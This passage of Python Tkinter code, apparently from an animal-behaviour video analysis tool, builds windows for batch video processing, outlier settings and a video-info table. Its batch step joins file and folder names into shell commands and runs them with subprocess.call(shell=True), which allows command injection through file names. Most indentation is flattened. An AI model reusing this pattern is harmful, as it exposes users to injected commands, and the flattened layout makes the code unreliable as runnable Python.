def addsec(self,secondToAdd):
outtimelist = []
# loop through and get final time
for i in range(len(self.filesFound)):
starttime = self.row[i].trimstart.get() #get the user's input
starttimelist = starttime.split(':') # split it into hours: minutes : seconds
            for j in range(len(starttimelist)): # strip a leading 0 so the value is compatible with the datetime format
                if starttimelist[j][0] == '0':
                    starttimelist[j] = starttimelist[j][1:]
hr,min,sec = starttimelist #get inputs for datetime
starttime = datetime.time(int(hr),int(min),int(sec))
out_time = str(self.addSecs(starttime,int(secondToAdd))) #call addSecs func: starttime + secondToAdd = out_time
outtimelist.append(out_time)
# add the final time into the table
for i in range(len(self.filesFound)):
self.row[i].trimend.delete(0, END)
self.row[i].trimend.insert(0,outtimelist[i])
def addSecs(self,tm, secs):
fulldate = datetime.datetime(100, 1, 1, tm.hour, tm.minute, tm.second)
fulldate = fulldate + datetime.timedelta(seconds=secs)
return fulldate.time()
def saveDownsamplesettings(self,width,height):
for i in range(len(self.filesFound)):
self.row[i].width.delete(0, END)
self.row[i].height.delete(0, END)
self.row[i].width.insert(0,width)
self.row[i].height.insert(0,height)
def saveShortensettings(self,startime,endtime):
for i in range(len(self.filesFound)):
self.row[i].trimstart.delete(0, END)
self.row[i].trimend.delete(0, END)
self.row[i].trimstart.insert(0,startime)
self.row[i].trimend.insert(0,endtime)
def selectall_clahe(self):
for i in range(len(self.filesFound)):
if self.title.clahe.get() == 1:
self.row[i].clahevid.select()
else:
self.row[i].clahevid.deselect()
def selectall_addframe(self):
for i in range(len(self.filesFound)):
if self.title.frameno.get() == 1:
self.row[i].superimposevid.select()
else:
self.row[i].superimposevid.deselect()
def selectall_grayscale(self):
for i in range(len(self.filesFound)):
if self.title.grayscale.get()==1:
self.row[i].grayscalevid.select()
else:
self.row[i].grayscalevid.deselect()
def selectall_downsample(self):
for i in range(len(self.filesFound)):
if self.title.downsample.get()==1:
self.row[i].downsamplevid.select()
else:
self.row[i].downsamplevid.deselect()
def selectall_shorten(self):
for i in range(len(self.filesFound)):
if self.title.shorten.get()==1:
self.row[i].shortenvid.select()
else:
self.row[i].shortenvid.deselect()
def get_thecroplist(self):
self.croplistt = []
for i in range(len(self.filesFound)):
self.croplistt.append((self.row[i].get_crop_list()))
print(self.croplistt)
self.croplistt = list(itertools.chain(*self.croplistt))
return self.croplistt
def get_shortenlist(self):
self.shortenlistt = []
for i in range(len(self.filesFound)):
if (self.row[i].shorten()) == 1:
self.shortenlistt.append(shortenvideos1_queue(self.outputdir,self.filesFound[i],self.row[i].getstarttime(),self.row[i].getendtime()))
return self.shortenlistt
def get_downsamplelist(self):
self.downsamplelistt = []
for i in range(len(self.filesFound)):
if (self.row[i].downsample()) == 1:
self.downsamplelistt.append(downsamplevideo_queue(self.row[i].getwidth(),self.row[i].getheight(),self.filesFound[i],self.outputdir))
return self.downsamplelistt
def get_grayscalelist(self):
self.grayscalelistt = []
for i in range(len(self.filesFound)):
if (self.row[i].grayscale()) == 1:
self.grayscalelistt.append(greyscale_queue(self.outputdir,self.filesFound[i]))
return self.grayscalelistt
def get_superimposeframelist(self):
self.superimposeframelistt = []
for i in range(len(self.filesFound)):
if (self.row[i].addframe()) == 1:
self.superimposeframelistt.append(superimposeframe_queue(self.outputdir, self.filesFound[i]))
return self.superimposeframelistt
def execute_processvideo(self):
# create a temp folder in the output dir
tmp_folder = os.path.join(self.outputdir,'tmp')
if os.path.exists(tmp_folder):
shutil.rmtree(tmp_folder)
os.mkdir(tmp_folder) #make temp folder
# remove process txt file if process were killed half way
try:
os.remove(os.path.join(self.outputdir,'process_video_define.txt'))
except:
print('Executing...')
# compiling the list of commands
try:
crop = self.get_thecroplist()
crop = [i for i in crop if i] ### remove any none in crop
except:
crop = []
try:
shorten = self.get_shortenlist()
except:
shorten = []
try:
downsample = self.get_downsamplelist()
except:
downsample = []
try:
grayscale = self.get_grayscalelist()
except:
grayscale = []
try:
superimpose = self.get_superimposeframelist()
except:
superimpose = []
## copy video and move it to output dir
copyvideos = []
for i in self.filesFound:
if currentPlatform == 'Windows':
command = 'copy \"' + str(self.videofolder) + '\\' + str(os.path.basename(i)) + '\" \"' + self.outputdir + '\"'
            if currentPlatform == 'Linux' or currentPlatform == 'Darwin':
command = 'cp "' + str(self.videofolder) + '/' + str(os.path.basename(i)) + '" "' + self.outputdir + '/"'
copyvideos.append(command)
#compiling all the commands into list
all_list = copyvideos + crop + shorten + downsample + grayscale + superimpose
print(len(all_list))
#creating text file
filepath = os.path.join(self.outputdir, 'process_video_define.txt')
if os.path.exists(filepath):
append_write = 'a' # append if already exists
else:
append_write = 'w' # make a new file if not
## writing into the txt file
highscore = open(filepath, append_write)
for i in all_list:
highscore.write(i + '\n')
highscore.close()
## running it using subprocess
with open(filepath) as fp:
for cnt, line in enumerate(fp):
                # TODO: probably branch here on the command type - handle ffmpeg calls with this path and other commands with a different subprocess invocation
subprocess.call(line, shell=True, stdout=subprocess.PIPE)
##clahe
for i in range(len(self.filesFound)):
if self.row[i].get_clahe() == 1:
clahe_queue(os.path.join(self.outputdir, os.path.basename(self.filesFound[i])))
else:
print('Clahe not applied to',str(self.filesFound[i]))
##rename the txt file ran
file = os.path.join(os.path.dirname(filepath), 'Processes_ran.txt')
os.rename(filepath, file)
dir = os.path.join(self.outputdir, 'process_archive')
try:
os.makedirs(dir)
print("Directory", dir, "created ")
except FileExistsError:
print("Directory", dir, "already exists")
currentDT = datetime.datetime.now()
currentDT = str(currentDT.month) + '_' + str(currentDT.day) + '_' + str(currentDT.year) + '_' + str(currentDT.hour) + 'hour' + '_' + str(currentDT.minute) + 'min' + '_' + str(currentDT.second) + 'sec'
try:
shutil.move(file, dir)
except shutil.Error:
os.rename(file, file[:-4] + str(currentDT) + '.txt')
shutil.move(file[:-4] + str(currentDT) + '.txt', dir)
print('Process video completed.')
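# Summary of the batch-processing flow implemented above: each selected operation is rendered
# into a shell command, the commands are written to process_video_define.txt in the output
# directory and executed one by one with subprocess.call, CLAHE is applied separately per video,
# and the command log is finally renamed to Processes_ran.txt and moved into process_archive/.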
class batch_processvideo: ##pre process video first menu (ask for input and output folder)
def __init__(self):
# Popup window
batchprocess = Toplevel()
batchprocess.minsize(400, 200)
batchprocess.wm_title("Batch process video")
#Video Selection Tab
label_videoselection = LabelFrame(batchprocess,text='Folder selection',font='bold',padx=5,pady=5)
self.folder1Select = FolderSelect(label_videoselection,'Video directory:',title='Select Folder with videos')
#output video
self.outputfolder = FolderSelect(label_videoselection,'Output directory:',title='Select a folder for your output videos')
#create list of all videos in the videos folder
button_cL = Button(label_videoselection,text='Confirm',command=self.confirmtable)
#organize
label_videoselection.grid(row=0,sticky=W)
self.folder1Select.grid(row=0,sticky=W)
self.outputfolder.grid(row=1,sticky=W)
button_cL.grid(row=2,sticky=W)
def confirmtable(self):
if (self.outputfolder.folder_path!='No folder selected')and(self.folder1Select.folder_path!='No folder selected'):
processvid_menu(self.folder1Select.folder_path, self.outputfolder.folder_path)
elif (self.outputfolder.folder_path=='No folder selected'):
print('Please select an output folder')
elif (self.folder1Select.folder_path == 'No folder selected'):
print('Please select a folder with videos')
else:
print('Please select folder with videos and the output directory')
class outlier_settings:
def __init__(self,configini):
self.configini = configini
#get the no of animals
config = ConfigParser()
configFile = str(configini)
config.read(configFile)
animalno = config.getint('General settings','animal_no')
# get list from csv
animalBpNames = define_bp_drop_down(configini)
# Popup window
outlier_set = Toplevel()
outlier_set.minsize(400, 400)
outlier_set.wm_title("Outlier Settings")
scroll = LabelFrame(hxtScrollbar(outlier_set))
scroll.grid()
IDList = config.get('Multi animal IDs', 'id_list')
if not IDList:
IDList = []
for i in range(animalno):
IDList.append('Animal ' + str(i+1))
else:
IDList = config.get('Multi animal IDs', 'id_list')
IDList = IDList.split(",")
# location correction menu bar
self.label_location_correction = LabelFrame(scroll, text='Location correction',font=('Times',12,'bold'),pady=5,padx=5)
self.choosebp1List, self.choosebp2List, self.var1List, self.var2List, self.dropDownBp1List, self.dropDownBp2List = [], [], [], [], [], []
for animal in range(len(IDList)):
animalIDname = IDList[animal]
currTextBp1 = 'Choose ' + str(animalIDname) + ' body part 1:'
currTextBp2 = 'Choose ' + str(animalIDname) + ' body part 2:'
self.choosebp1List.append(Label(self.label_location_correction, text=currTextBp1))
self.choosebp2List.append(Label(self.label_location_correction, text=currTextBp2))
self.var1List.append(StringVar())
self.var2List.append(StringVar())
self.var1List[animal].set(animalBpNames[animal][0])
self.var2List[animal].set(animalBpNames[animal][1])
self.dropDownBp1List.append(OptionMenu(self.label_location_correction, self.var1List[animal], *animalBpNames[animal]))
self.dropDownBp2List.append(OptionMenu(self.label_location_correction, self.var2List[animal], *animalBpNames[animal]))
self.location_criterion = Entry_Box(self.label_location_correction, 'Location criterion', '15')
# movement
self.label_movement_correction = LabelFrame(scroll, text='Movement correction', font=('Times', 12, 'bold'),pady=5, padx=5)
self.choosebp1ListMov, self.choosebp2ListMov, self.var1ListMov, self.var2ListMov, self.dropDownBp1ListMov, self.dropDownBp2ListMov = [], [], [], [], [], []
for animal in range(len(IDList)):
animalIDname = IDList[animal]
currTextBp1 = 'Choose ' + str(animalIDname) + ' body part 1:'
currTextBp2 = 'Choose ' + str(animalIDname) + ' body part 2:'
self.choosebp1ListMov.append(Label(self.label_movement_correction, text=currTextBp1))
self.choosebp2ListMov.append(Label(self.label_movement_correction, text=currTextBp2))
self.var1ListMov.append(StringVar())
self.var2ListMov.append(StringVar())
self.var1ListMov[animal].set(animalBpNames[animal][0])
self.var2ListMov[animal].set(animalBpNames[animal][1])
self.dropDownBp1ListMov.append(OptionMenu(self.label_movement_correction, self.var1ListMov[animal], *animalBpNames[animal]))
self.dropDownBp2ListMov.append(OptionMenu(self.label_movement_correction, self.var2ListMov[animal], *animalBpNames[animal]))
self.movement_criterion = Entry_Box(self.label_movement_correction, 'Movement criterion', '15')
# mean or median
medianlist = ['mean', 'median']
self.medianvar = StringVar()
self.medianvar.set(medianlist[0])
label_median = LabelFrame(scroll, text='Median or Mean', font=('Times', 12, 'bold'), pady=5, padx=5)
mediandropdown = OptionMenu(label_median, self.medianvar, *medianlist)
button_setvalues = Button(scroll, text='Confirm', command=self.set_outliersettings, font=('Arial', 12, 'bold'),fg='red')
self.label_location_correction.grid(row=0, sticky=W)
self.location_criterion.grid(row=100, column=0, sticky=W)
for row, dropdown in zip(range(0, len(IDList)+4, 2), range(len(IDList)+1)):
try:
self.choosebp1List[dropdown].grid(row=row, column=0, sticky=W)
self.dropDownBp1List[dropdown].grid(row=row, column=1, sticky=W)
self.choosebp2List[dropdown].grid(row=row+1, column=0, sticky=W)
self.dropDownBp2List[dropdown].grid(row=row+1, column=1, sticky=W)
except IndexError:
pass
self.label_movement_correction.grid(row=1, sticky=W)
self.movement_criterion.grid(row=100, sticky=W)
for row, dropdown in zip(range(0, len(IDList) + 2, 2), range(len(IDList) + 1)):
try:
self.choosebp1ListMov[dropdown].grid(row=row, column=0, sticky=W)
self.dropDownBp1ListMov[dropdown].grid(row=row, column=1, sticky=W)
self.choosebp2ListMov[dropdown].grid(row=row + 1, column=0, sticky=W)
self.dropDownBp2ListMov[dropdown].grid(row=row + 1, column=1, sticky=W)
except IndexError:
pass
label_median.grid(row=2,column=0,sticky=W)
mediandropdown.grid(row=2,sticky=W)
button_setvalues.grid(row=3,pady=10)
def set_outliersettings(self):
# export settings to config ini file
configini = self.configini
config = ConfigParser()
config.read(configini)
animalno = config.getint('General settings', 'animal_no')
animalNameList = []
try:
multiAnimalIDList = config.get('Multi animal IDs', 'id_list')
multiAnimalIDList = multiAnimalIDList.split(",")
except NoSectionError:
multiAnimalIDList = ['']
if multiAnimalIDList[0] == '':
for animal in range(animalno):
animalNameList.append('Animal_' + str(animal+1))
else:
animalNameList = multiAnimalIDList
try:
for animal in range(len(animalNameList)):
locBp1 = self.var1List[animal].get()
locBp2 = self.var2List[animal].get()
movBp1 = self.var1ListMov[animal].get()
movBp2 = self.var2ListMov[animal].get()
config.set('Outlier settings', 'movement_bodyPart1_' + str(animalNameList[animal]), str(movBp1))
config.set('Outlier settings', 'movement_bodyPart2_' + str(animalNameList[animal]), str(movBp2))
config.set('Outlier settings', 'location_bodyPart1_' + str(animalNameList[animal]), str(locBp1))
config.set('Outlier settings', 'location_bodyPart2_' + str(animalNameList[animal]), str(locBp2))
movementcriterion = self.movement_criterion.entry_get
locationcriterion = self.location_criterion.entry_get
mean_or_median = self.medianvar.get()
config.set('Outlier settings', 'movement_criterion', str(movementcriterion))
config.set('Outlier settings', 'location_criterion', str(locationcriterion))
config.set('Outlier settings', 'mean_or_median', str(mean_or_median))
with open(configini, 'w') as configfile:
config.write(configfile)
print('Outlier correction settings updated in project_config.ini')
except:
print('Please make sure all fields are filled in correctly.')
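# Reusable Tkinter helper widgets used by the windows below: FolderSelect/FileSelect
# pair a description label, a read-only path display and a Browse button; DropDownMenu
# wraps an OptionMenu around a StringVar; Entry_Box wraps a labelled Entry with optional
# key-stroke validation.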
class FolderSelect(Frame):
def __init__(self,parent=None,folderDescription="",color=None,title=None,lblwidth =None,**kw):
self.title=title
self.color = color if color is not None else 'black'
self.lblwidth = lblwidth if lblwidth is not None else 0
self.parent = parent
Frame.__init__(self,master=parent,**kw)
self.folderPath = StringVar()
self.lblName = Label(self, text=folderDescription,fg=str(self.color),width=str(self.lblwidth),anchor=W)
self.lblName.grid(row=0,column=0,sticky=W)
self.entPath = Label(self, textvariable=self.folderPath,relief=SUNKEN)
self.entPath.grid(row=0,column=1)
self.btnFind = Button(self, text="Browse Folder",command=self.setFolderPath)
self.btnFind.grid(row=0,column=2)
self.folderPath.set('No folder selected')
def setFolderPath(self):
folder_selected = askdirectory(title=str(self.title),parent=self.parent)
if folder_selected:
self.folderPath.set(folder_selected)
else:
self.folderPath.set('No folder selected')
@property
def folder_path(self):
return self.folderPath.get()
class DropDownMenu(Frame):
def __init__(self,parent=None,dropdownLabel='',choice_dict=None,labelwidth='',com=None,**kw):
Frame.__init__(self,master=parent,**kw)
self.dropdownvar = StringVar()
self.lblName = Label(self,text=dropdownLabel,width=labelwidth,anchor=W)
self.lblName.grid(row=0,column=0)
self.choices = choice_dict
self.popupMenu = OptionMenu(self,self.dropdownvar,*self.choices,command=com)
self.popupMenu.grid(row=0,column=1)
def getChoices(self):
return self.dropdownvar.get()
def setChoices(self,choice):
self.dropdownvar.set(choice)
class FileSelect(Frame):
def __init__(self,parent=None,fileDescription="",color=None,title=None,lblwidth=None,**kw):
self.title=title
self.color = color if color is not None else 'black'
self.lblwidth = lblwidth if lblwidth is not None else 0
self.parent=parent
Frame.__init__(self,master=parent,**kw)
self.filePath = StringVar()
self.lblName = Label(self, text=fileDescription,fg=str(self.color),width=str(self.lblwidth),anchor=W)
self.lblName.grid(row=0,column=0,sticky=W)
self.entPath = Label(self, textvariable=self.filePath,relief=SUNKEN)
self.entPath.grid(row=0,column=1)
self.btnFind = Button(self, text="Browse File",command=self.setFilePath)
self.btnFind.grid(row=0,column=2)
self.filePath.set('No file selected')
def setFilePath(self):
file_selected = askopenfilename(title=self.title,parent=self.parent)
if file_selected:
self.filePath.set(file_selected)
else:
self.filePath.set('No file selected')
@property
def file_path(self):
return self.filePath.get()
class Entry_Box(Frame):
def __init__(self, parent=None, fileDescription="", labelwidth='',status=None, validation=None, **kw):
super(Entry_Box, self).__init__(master=parent)
self.validation_methods = {
'numeric': (self.register(form_validator_is_numeric), '%P', '%d'),
}
self.status = status if status is not None else NORMAL
self.labelname = fileDescription
Frame.__init__(self,master=parent,**kw)
self.filePath = StringVar()
self.lblName = Label(self, text=fileDescription,width=labelwidth,anchor=W)
self.lblName.grid(row=0,column=0)
self.entPath = Entry(self, textvariable=self.filePath, state=self.status,
validate='key',
validatecommand=self.validation_methods.get(validation, None))
self.entPath.grid(row=0,column=1)
@property
def entry_get(self):
return self.entPath.get()
def entry_set(self, val):
self.filePath.set(val)
def set_state(self,setstatus):
self.entPath.config(state=setstatus)
def destroy(self):
self.lblName.destroy()
self.entPath.destroy()
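# Usage sketch for the helper widgets above (the parent frame and the values shown
# are placeholders, not part of this file):
#   criterion = Entry_Box(parent, 'Movement criterion', '20', validation='numeric')
#   criterion.entry_set('0.7')
#   value = criterion.entry_get                      # current text in the entry
#   video = FileSelect(parent, 'Video path', title='Select a video file')
#   path = video.file_path                           # 'No file selected' until browsed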
class newcolumn(Frame):
def __init__(self,parent=None,lengthoflist=[],width='',**kw):
Frame.__init__(self,master=parent,**kw)
self.entPath = []
self.entPathvars =[]
for i in range(len(lengthoflist)):
self.entPathvar = IntVar()
self.entPathvars.append(self.entPathvar)
self.entPath.append(Entry(self, textvariable=self.entPathvars[i],width=width))
self.entPath[i].grid(row=i,pady=3)
def entry_get(self,row):
return self.entPath[row].get()
def setvariable(self,row,vars):
return self.entPathvars[row].set(vars)
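# Button_getcoord builds one 'Get coord' button and one pixels/mm entry per video;
# each button calls get_coordinates_nilsson() with the video path and the known
# distance (mm) and writes the returned pixels/mm value into the matching entry.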
class Button_getcoord(Frame):
def __init__(self,parent=None,filename=[],knownmm=[],ppmlist = None,**kw): #set to list and use range i in list to call each elements in list
Frame.__init__(self, master=parent, **kw)
self.entPath = []
self.ppm_list = []
self.ppmvar = []
self.filename = filename
labelgetcoord =Label(self,text='Get coord')
labelgetcoord.grid(row=0,pady=6)
labelppm =Label(self,text='Pixels/mm')
labelppm.grid(row=0,column=1)
for i in range(len(filename)-1):
self.entPath.append(Button(self,text='Video'+str(i+1),command =lambda i=i :self.getcoord_forbutton(filename[i+1],knownmm[i+1],i)))
self.entPath[i].grid(row=i+1)
self.ppmvars=IntVar()
self.ppmvar.append(self.ppmvars)
self.ppm_list.append(Entry(self,textvariable=self.ppmvar[i]))
self.ppm_list[i].grid(row=i+1,column=1)
if ppmlist != None:
try:
for i in range(len(self.ppmvar)):
self.ppmvar[i].set(ppmlist[i])
except IndexError:
pass
print(ppmlist)
def getcoord_forbutton(self,filename,knownmm,count):
ppm = get_coordinates_nilsson(filename,knownmm)
if ppm == float('inf'):
print('Divide by zero error. Please make sure the values in [Distance_in_mm] are updated')
else:
self.ppmvar[count].set(ppm)
def getppm(self,count):
ppms = self.ppm_list[count].get()
return ppms
def set_allppm(self,value):
for i in range(len(self.filename) - 1):
self.ppmvar[i].set(value)
def Exit():
app.root.destroy()
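# Mouse-wheel helpers: Tkinter reports event.delta in raw units on macOS (Darwin)
# but in multiples of 120 on Windows, hence the platform check and division below.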
def onMousewheel(event, canvas):
try:
scrollSpeed = event.delta
if platform.system() == 'Darwin':
scrollSpeed = event.delta
elif platform.system() == 'Windows':
scrollSpeed = int(event.delta / 120)
canvas.yview_scroll(-1 * (scrollSpeed), "units")
except:
pass
def bindToMousewheel(event, canvas):
canvas.bind_all("<MouseWheel>", lambda event: onMousewheel(event, canvas))
def unbindToMousewheel(event, canvas):
canvas.unbind_all("<MouseWheel>")
def onFrameConfigure(canvas):
'''Reset the scroll region to encompass the inner frame'''
canvas.configure(scrollregion=canvas.bbox("all"))
def hxtScrollbar(master):
'''
Create canvas.
Create a frame and put it in the canvas.
Create two scrollbar and insert command of canvas x and y view
Use canvas to create a window, where window = frame
Bind the frame to the canvas
'''
bg = master.cget("background")
acanvas = Canvas(master, borderwidth=0, background=bg)
frame = Frame(acanvas, background=bg)
vsb = Scrollbar(master, orient="vertical", command=acanvas.yview)
vsb2 = Scrollbar(master, orient='horizontal', command=acanvas.xview)
acanvas.configure(yscrollcommand=vsb.set)
acanvas.configure(xscrollcommand=vsb2.set)
vsb.pack(side="right", fill="y")
vsb2.pack(side="bottom", fill="x")
acanvas.pack(side="left", fill="both", expand=True)
acanvas.create_window((10, 10), window=frame, anchor="nw")
# bind the frame to the canvas
acanvas.bind("<Configure>", lambda event, canvas=acanvas: onFrameConfigure(acanvas))
acanvas.bind('<Enter>', lambda event: bindToMousewheel(event, acanvas))
acanvas.bind('<Leave>', lambda event: unbindToMousewheel(event,acanvas))
return frame
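# video_info_table builds a scrollable table with one row per video in the project's
# 'videos' folder; fps, resolution and the known distance are pre-filled with OpenCV
# (or from an existing logs/video_info.csv for videos no longer on disk), and the
# table, including the computed pixels/mm column, is written back to logs/video_info.csv.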
class video_info_table:
def __init__(self,configini):
self.filesFound = [0] #initiate files found
config = ConfigParser()
self.configFile = str(configini)
config.read(self.configFile)
projectPath = config.get('General settings', 'project_path')
video_info_csv = os.path.join(projectPath, 'logs', 'video_info.csv')
self.config_videofolders = os.path.join(projectPath, 'videos')
config_distancemm = config.get('Frame settings', 'distance_mm')
########### FIND FILES ###########
for i in os.listdir(self.config_videofolders):
if i.endswith(('.avi', '.mp4', '.mov', '.flv', '.m4v')):
self.filesFound.append(i)
# if csv exist, find the difference and append
if os.path.exists(video_info_csv):
df = pd.read_csv(video_info_csv)
videodf = df['Video'].to_list()
videodf = [s +'.mp4' for s in videodf]
videodf = list(set(videodf) - set(self.filesFound))
self.filesFound += videodf
##GUI
self.tkintertable = Toplevel()
self.tkintertable.minsize(1000, 500)
self.tkintertable.wm_title("Video Info")
self.xscrollbar = Canvas(hxtScrollbar(self.tkintertable))
self.xscrollbar.pack(expand=True,fill=BOTH)
self.myframe = LabelFrame(self.xscrollbar,text='Table')
self.myframe.grid(row=6)
self.new_col_list = ['index','Video','fps','Resolution_width','Resolution_height','Distance_in_mm']
self.table_col=[]
self.col_width= ['6','35','20','20','20','20']
#### loop for tables######
for i in range(len(self.new_col_list)):
self.table_col.append(newcolumn(self.myframe,self.filesFound,self.col_width[i]))
self.table_col[i].grid(row=0,column=i, sticky=W)
###set values for base####
count = 0
for i in self.filesFound:
currvid= os.path.join(str(self.config_videofolders),str(i))
if os.path.exists(currvid) or i==0:
vid= cv2.VideoCapture(currvid)
self.table_col[0].setvariable(count,str(count)+'.')
self.table_col[1].setvariable(count,i)
self.table_col[2].setvariable(count, int(vid.get(cv2.CAP_PROP_FPS)))
self.table_col[3].setvariable(count, int(vid.get(cv2.CAP_PROP_FRAME_WIDTH)))
self.table_col[4].setvariable(count, int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT)))
self.table_col[5].setvariable(count,config_distancemm)
else:
self.table_col[0].setvariable(count, str(count) + '.')
self.table_col[1].setvariable(count, i)
self.table_col[2].setvariable(count, int(df.loc[df['Video']==i.split('.')[0]].values.tolist()[0][1]))
self.table_col[3].setvariable(count, int(df.loc[df['Video']==i.split('.')[0]].values.tolist()[0][2]))
self.table_col[4].setvariable(count, int(df.loc[df['Video']==i.split('.')[0]].values.tolist()[0][3]))
self.table_col[5].setvariable(count, config_distancemm)
count+=1
#set title
count=0
for i in self.new_col_list:
self.table_col[count].setvariable(0,i)
count+=1
###set up get coord button on table####
self.data_lists = []
for i in range(len(self.table_col)):
self.data_lists.append([])
for i in self.filesFound:
self.data_lists[1].append(os.path.join(self.config_videofolders, str(i)))
self.data_lists[5].append(int(0))
if os.path.exists(video_info_csv):
df = pd.read_csv(video_info_csv)
videoincsv = df['Video'].tolist()
pixelsincsv = df['pixels/mm'].tolist()
df_dict = dict(zip(videoincsv,pixelsincsv))
videoslist = self.filesFound.copy()
videoslist = videoslist[1:]
for i in range(len(videoslist)):
videoslist[i] = str(videoslist[i]).split('.')[0]
videosdict = dict(zip(videoslist,range(len(videoslist))))
for keys in videosdict.keys():
if keys in df_dict:
videosdict[keys] = df_dict[keys]
else:
videosdict[keys] = 0
pixellist = list(videosdict.values())
self.pixel_list = pixellist
self.getdata()
self.button = Button_getcoord(self.xscrollbar, self.data_lists[1], self.data_lists[5],pixellist)
self.button.grid(row=6, column=1)
else:
self.pixel_list= None
self.getdata()
self.button = Button_getcoord(self.xscrollbar,self.data_lists[1],self.data_lists[5])
self.button.grid(row=6,column=1)
#instructions
label_getdatadesc1 = Label(self.xscrollbar,text='1. Enter the known distance (mm) in the "Distance_in_mm" column. Consider using the "autopopulate" entry box if you have a lot of videos.')
label_getdatadesc2 = Label(self.xscrollbar,text='2. Click on <Update distance_in_mm> button before clicking on the "Get coord" button(s) to calculate pixels/mm.')
label_getdatadesc3 = Label(self.xscrollbar,text='3. Click <Save Data> when all the data are filled in. Use the <Add Column> button to add information on each video, e.g., animal ID or experimental group.')
label_getdatadesc1.grid(row=0,sticky=W)
label_getdatadesc2.grid(row=1, sticky=W)
label_getdatadesc3.grid(row=2, sticky=W)
get_data_button = Button(self.xscrollbar, text='Update distance_in_mm', command=self.getdata)
get_data_button.grid(row=3,sticky=W)
add_column_button = Button(self.xscrollbar,text='<Add Column>',command=self.addBox,fg='red')
add_column_button.grid(row=4,sticky=W)
generate_csv_button = Button(self.xscrollbar,text='Save Data',command=self.generate_video_info_csv,font='bold',fg='red')
generate_csv_button.grid(row=5)
setppmbutton = Button(self.xscrollbar,text='Duplicate index 1 pixel/mm (CAUTION!)',command= self.setAll_ppm, fg='red')
setppmbutton.grid(row =5,column=1)
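# The methods below back the table buttons: addBox appends an extra user-defined column,
# getdata re-reads every cell and rebuilds the 'Get coord' buttons, and
# generate_video_info_csv transposes the collected columns into a DataFrame and writes
# logs/video_info.csv.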
def addBox(self):
self.new_col_list.append(0)
self.next_column = len(self.new_col_list)
#print(self.next_column)
self.table_col.append(newcolumn(self.myframe,self.filesFound,'20'))
self.table_col[(self.next_column)-1].grid(row=0,column=self.next_column)
def getdata(self):
self.data_lists =[]
#get all data from tables
for i in range(len(self.table_col)):
self.data_lists.append([])
for j in range(len(self.filesFound)):
self.data_lists[i].append(self.table_col[i].entry_get(j))
# add path to videos for get coord
if currentPlatform == 'Windows':
self.data_lists[1] = [str(self.config_videofolders)+'\\'+s for s in self.data_lists[1]]
if (currentPlatform == 'Linux') or (currentPlatform == 'Darwin'):
self.data_lists[1] = [str(self.config_videofolders)+'/'+s for s in self.data_lists[1]]
if self.pixel_list!= None:
self.button = Button_getcoord(self.xscrollbar, self.data_lists[1], self.data_lists[5],self.pixel_list)
self.button.grid(row=6, column=1)
else:
#update get coord with data
self.button = Button_getcoord(self.xscrollbar,self.data_lists[1],self.data_lists[5])
self.button.grid(row=6,column=1)
print("Table updated.")
def generate_video_info_csv(self):
#get latest data from table
self.data_lists = []
# get all data from tables
for i in range(len(self.table_col)):
self.data_lists.append([])
for j in range(len(self.filesFound)):
self.data_lists[i].append(self.table_col[i].entry_get(j))
#get the ppm from table
self.ppm=['pixels/mm']
for i in range(len(self.filesFound)-1):
self.ppm.append((self.button.getppm(i)))
self.data_lists.append(self.ppm)
#remove the file extension from the video name column
self.data_lists[1] = [os.path.splitext(i)[0] for i in self.data_lists[1]]
self.data_lists[1][0] ='Video'
data=self.data_lists
df=pd.DataFrame(data=data)
df=df.transpose()
df=df.rename(columns=df.iloc[0])
df=df.drop(df.index[0])
df=df.reset_index()
df=df.drop(['index'],axis=1)
df=df.drop(['level_0'],axis=1)
logFolder = os.path.join(os.path.dirname(self.configFile), 'logs')
csv_filename = 'video_info.csv'
output = os.path.join(logFolder, csv_filename)
df.to_csv(str(output),index=False)
print(output, 'generated.')
def setAll_ppm(self):
firstvalue = self.button.getppm(0)
self.button.set_allppm(firstvalue)
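# video_downsample: popup for downsampling a single video either to a custom
# width/height or to one of the preset resolutions, via downsamplevideo().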
class video_downsample:
def __init__(self):
# Popup window
videosdownsample = Toplevel()
videosdownsample.minsize(200, 200)
videosdownsample.wm_title("Downsample Video Resolution")
# Video Path
self.videopath1selected = FileSelect(videosdownsample, "Video path",title='Select a video file')
label_choiceq = Label(videosdownsample, text='Choose only one of the following methods to downsample videos (Custom/Default)')
#custom reso
label_downsamplevidcustom = LabelFrame(videosdownsample,text='Custom resolution',font='bold',padx=5,pady=5)
# width
self.label_width = Entry_Box(label_downsamplevidcustom,'Width','10')
# height
self.label_height = Entry_Box(label_downsamplevidcustom,'Height','10')
# confirm custom resolution
self.button_downsamplevideo1 = Button(label_downsamplevidcustom, text='Downsample to custom resolution',command=self.downsample_customreso)
#Default reso
# Checkbox
label_downsampleviddefault = LabelFrame(videosdownsample,text='Default resolution',font ='bold',padx=5,pady=5)
self.var1 = IntVar()
self.checkbox1 = Radiobutton(label_downsampleviddefault, text="1920 x 1080", variable=self.var1,value=1)
self.checkbox2 = Radiobutton(label_downsampleviddefault, text="1280 x 720", variable=self.var1,value=2)
self.checkbox3 = Radiobutton(label_downsampleviddefault, text="720 x 480", variable=self.var1, value=3)
self.checkbox4 = Radiobutton(label_downsampleviddefault, text="640 x 480", variable=self.var1, value=4)
self.checkbox5 = Radiobutton(label_downsampleviddefault, text="320 x 240", variable=self.var1, value=5)
# Downsample video
self.button_downsamplevideo2 = Button(label_downsampleviddefault, text='Downsample to default resolution',command=self.downsample_defaultreso)
# Organize the window
self.videopath1selected.grid(row=0,sticky=W)
label_choiceq.grid(row=1, sticky=W,pady=10)
label_downsamplevidcustom.grid(row=2,sticky=W,pady=10)
self.label_width.grid(row=0, column=0,sticky=W)
self.label_height.grid(row=1, column=0,sticky=W)
self.button_downsamplevideo1.grid(row=3)
label_downsampleviddefault.grid(row=3,sticky=W,pady=10)
self.checkbox1.grid(row=0,stick=W)
self.checkbox2.grid(row=1,sticky=W)
self.checkbox3.grid(row=2, sticky=W)
self.checkbox4.grid(row=3, sticky=W)
self.checkbox5.grid(row=4, sticky=W)
self.button_downsamplevideo2.grid(row=5)
def downsample_customreso(self):
self.width1 = self.label_width.entry_get
self.height1 = self.label_height.entry_get
ds = downsamplevideo(self.width1, self.height1, self.videopath1selected.file_path)
def downsample_defaultreso(self):
if self.var1.get()==1:
self.width2 = str(1920)
self.height2 = str(1080)
print('The width selected is ' + str(self.width2) + ', the height is ' + str(self.height2))
elif self.var1.get()==2:
self.width2 = str(1280)
self.height2 = str(720)
print('The width selected is ' + str(self.width2) + ', the height is ' + str(self.height2))
elif self.var1.get()==3:
self.width2 = str(720)
self.height2 = str(480)
